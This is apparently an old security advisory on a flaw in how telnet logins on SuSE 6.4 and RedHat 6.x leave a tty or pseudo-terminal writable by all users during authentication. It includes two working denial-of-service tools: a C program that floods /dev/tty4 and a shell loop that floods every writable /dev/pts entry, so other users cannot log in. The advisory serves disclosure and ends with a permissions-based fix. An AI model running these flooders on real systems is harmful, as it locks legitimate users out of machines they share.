COMMAND

    tty

SYSTEMS AFFECTED

    SuSE linux 6.4, RedHat 6.x

PROBLEM

    Following is based on Securax Advisory 13.  When someone telnets to
    a UNIX system, the tty assigned to him is writable by every user on
    the system for as long as he is still logging in.  Once he is logged
    in, his tty is no longer writable by all users.  So if someone
    writes data to a tty that is currently in use by a user who is in
    the middle of logging in, that user won't be able to log in.

    The impact can be pretty severe: nobody is able to log in.  The
    proof of concept code below demonstrates this, but only on one given
    tty.  This was done for two basic reasons: first, so the kiddies
    can't play too much with this code, and second, because it was
    written in less than 5 minutes (there was a lack of time).

    /*
     * ttwrite.c
     * ---------
     *
     * written by ROOT-dude
     *
     * ok, this code is pretty shitty, but it works
     * so far it's only set to flood tty4, but with a
     * little modification, you can flood all tty's.
     * I made this limitation so the kiddies can't
     * play too much !!!  (THIS IS ONLY PROOF OF
     * CONCEPT CODE !!!!)
     *
     * I found this bug when I was messing around
     * with this tool I found, called m0000h.sh
     * which did the same but for /dev/pts,
     * (that still isn't fixed btw) only "prob" is
     * pts is for pseudo terminals, so a normal
     * remote telnet connection will get a tty assigned
     * and not a pts !!!!
     *
     * greetZ to :: incubus, f0bic, F_F, nostalgic,
     * t-omicron, zym0t1c, tosh, vorlon, cicero,
     * zoa, demongirl, so many others i forgot ...
     *
     */

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <string.h>
    #include <strings.h>   /* bzero() */
    #include <sys/types.h>
    #include <sys/stat.h>
    #include <fcntl.h>

    #define string "aaaaaaaaaa"

    int main(void)
    {
     int fd;
     char tty[25];

     bzero(tty, sizeof(tty));
     strcat(tty, "/dev/tty4"); /* change to tty you want */

     /* spin until the tty can be opened for writing, i.e. until
        somebody is in the middle of logging in on it and it is
        still writable by everyone */
     fd = open(tty, O_WRONLY);
     while(fd < 0)
     {
      fd = open(tty, O_WRONLY);
     }

     /* keep the descriptor and flood the terminal until we are killed;
        the open fd stays valid even after login changes the mode */
     while(fd)
     {
      write(fd, string, strlen(string));
     }

     close(fd); /* no need to close it, but we'll code it anyway !*/
     return 0;
    }

    A long time ago teleh0r, and someone called c0sa_n0stra, wrote a
    shell script which floods the terminal of a user who is trying to
    log in.  Since then this code has been known as m000h.sh.

    The problem is the way the telnet daemon assigns a terminal to a new
    user: while the user is telling telnetd who he is and what his
    password is, his terminal is already waiting in /dev/pts/ and is
    writable by anyone.  As soon as he has logged in, it no longer is.

    It is still possible for him to log in, though, even if a binary is
    cat'ed to the terminal (but, as Fyodor pointed out, it may mess up
    his terminal).

    sshd/rshd/rlogind do not behave this way: there is no writable
    terminal in /dev/pts/ while the authentication is taking place.

    The below script has been tested on Redhat 6.1 and 6.2.

    #!/bin/sh
    # m000h.sh - flood every pseudo terminal we are allowed to write to,
    # i.e. a /dev/pts entry on which somebody is still being authenticated

    TTYDIR=/dev/pts
    NONSENSE=/bin/nice      # any binary will do: junk bytes for the victim's screen
    MYTTY=`tty`             # to prevent flooding of one's own TTY

    while :; do
        for i in "$TTYDIR"/* ; do
            # only character devices we may write to, and never our own
            if [ -w "$i" -a -c "$i" -a "$i" != "$MYTTY" ]; then
                cat "$NONSENSE" > "$i" 2>/dev/null
            fi
        done
    done

SOLUTION

    At least AIX 4.3.3 seems to set /dev/pts/? to:

        c---------   1 root     system    28,  3 Jan 03 23:06 3

    during telnet authentication, i.e. with no permission bits set at
    all, so the device is not writable by other users while the login
    is in progress.